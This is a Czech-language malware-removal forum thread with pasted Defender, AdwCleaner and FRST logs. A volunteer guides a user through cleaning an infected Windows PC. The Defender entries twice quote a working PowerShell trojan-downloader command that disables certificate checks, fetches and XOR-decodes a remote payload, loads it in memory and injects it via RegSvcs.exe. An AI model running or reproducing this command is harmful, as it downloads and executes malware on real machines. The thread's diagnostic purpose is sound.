Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 10:29:02.0140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2507.0, AS: 1.329.2507.0, NIS: 1.329.2507.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 72%
Total physical RAM: 3767.05 MB
Available physical RAM: 1051.44 MB
Total Virtual: 7351.05 MB
Available Virtual: 4661.58 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:60.17 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 18:54
od Diallix
Dobry den.

:arrow: Stiahnite si na plochu nastroj AdwCleaner, link. na stiahnutie tu: https://toolslib.net/downloads/finish/1/
Pred spustenim nastroja povypinajte vsetke beziace okna programov, to su vsetke beziace programy pod desktopom.
Kliknite pravym tlacidlom mysi na program -> spustit ako Administrator.
Pokracujte kliknutim na tlacidlo Prehladaj teraz (Scan now) a pockajte, kym sa system doskenuje.
Po skene nechajte oznacene vsetky chlieviky, pripadne najdene hrozieby a pokracujte v dolnom pravom rohu tlacidlom Vycistit Teraz (Clean and Repair).
Po restartovani PC sa spusti nastroj AdwCleaner, kliknite na Zobrazit soubor protokolu.
Spusti sa log, jeho obsah skopirujte sem.

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 19:11
od chenny
Tady je další log

# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 10
# Failed: 0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted WebSearch
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]
AdwCleaner[C01].txt - [2028 octets] - [20/01/2021 17:12:09]
AdwCleaner[S02].txt - [2149 octets] - [20/01/2021 19:08:48]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C02].txt ##########

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 19:17
od Diallix
Poprosim o nove logy FRST + ADDITION.

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 19:49
od chenny
FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 19:42:40)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:40 - 2021-01-20 19:43 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
